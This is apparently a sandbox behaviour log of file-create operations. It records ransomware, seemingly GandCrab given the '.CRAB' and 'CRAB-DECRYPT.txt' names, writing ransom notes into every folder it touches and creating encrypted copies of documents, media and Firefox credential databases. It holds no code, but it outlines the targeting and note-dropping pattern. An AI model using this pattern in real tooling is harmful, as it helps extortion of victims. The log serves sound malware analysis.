Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\bookmarkbackups\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-05_5.json.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\bookmarkbackups\bookmarks-2017-06-16_5.json.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\downloads.sqlite.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\extensions.ini.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\extensions.sqlite.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\indexedDB\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\indexedDB\moz-safe-about+home\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\indexedDB\moz-safe-about+home\idb\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\key3.db.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\marionette.log.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\mimeTypes.rdf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\minidumps\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\search.json.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\secmod.db.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\sessionstore.bak.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\sessionstore.js.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\signons.sqlite.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\times.json.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\webapps\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\webappsstore.sqlite.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\o5Sr.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\OCDQc.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\OQ76.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Q7m4 o69UFJZp0QFw.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\RnyloUvEiOlgFswWxoi.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\SayBusYjAXv.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\tTlmm _BZQiif.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Tz4ATGFHqmeH_XF9.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\vI8uu4E.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\WEGdsqHxrB6Rl_.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\wzIZj94sBmPj.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Application Data\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Cookies\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2OGH.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\3NFt.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4ftsZpMw1g3gL.avi.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\76LU7Z52NxT.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\8kO0NJEBI0t_aH4wR4C.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\94BuT.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DV_MFjkGN0qANiJ.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EtiFc2zH--B_1kTHu.pdf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eTzwqz6GP.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fNHcSxfi.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\g4DSA4yI-juQrohXF.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ItpORrGbjc7K7PCQ.pdf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\je9RaKcUCm.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\MLiKMbL.rtf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\SIk0c068 gsVkndwes.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sYFnn -89NTf68gdMaV.xls.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uEeSzrUjPm-tdWsGKZ.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\V092xFSO9H2CfEGV6.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Whl7ioH1a1.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\0hntmH.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\2a-LEH3kNNcEpoRFI7AR.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\51DcHy3JNxvL.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\FP5YUa2nFPMs.jpg.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\GOOFQ22cgu.wav.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\JaAUuMCO3cS.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\dp2 xk0V_8T-w0_PfnT\kgX4.flv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\I4RoqHAFyJKCzMDS_.mkv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\jkbwIB639vo5.gif.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\ry-yusa93pJEt0f7.mp3.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\WAYwwcRHKyM5aOVAri7I.odp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yDTOs3XgmnBA7E33YPzb\X6 hWpS.png.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yMwD01eZD.bmp.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ZVazYW1Y4JPIe.m4a.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxggaoU.mp4.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_bssIabjo1Er7s61_2.rtf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\08W494ygrrR2UQM3xN.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2SBlngwiU-8Y.docx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3jDiw_Nhsj.xlsx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45cjUXPsWNUYZZ.csv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Nyie1u9CnS\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Nyie1u9CnS\RRYIeD.ots.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Nyie1u9CnS\wRuHiSpE6u4.csv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\I5i-H.csv.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\WV5O6EW.doc.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bBmcaUJi9aF\x5ZPZus4kM.doc.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\DyqOvvnqQfnopF.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EPBBoe7Ro1v0ShX.docx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\et5e5Za ixxXB9f30.xlsx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\HCVI7ZX2o.pptx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\\CRAB-DECRYPT.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\6ha0-v.rtf.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\E8f8L-CRfhlmsWwyWOn.ods.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ihfa5ABiYSL\IMHhzPfLf4hL63ueKPIt.docx.CRAB	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
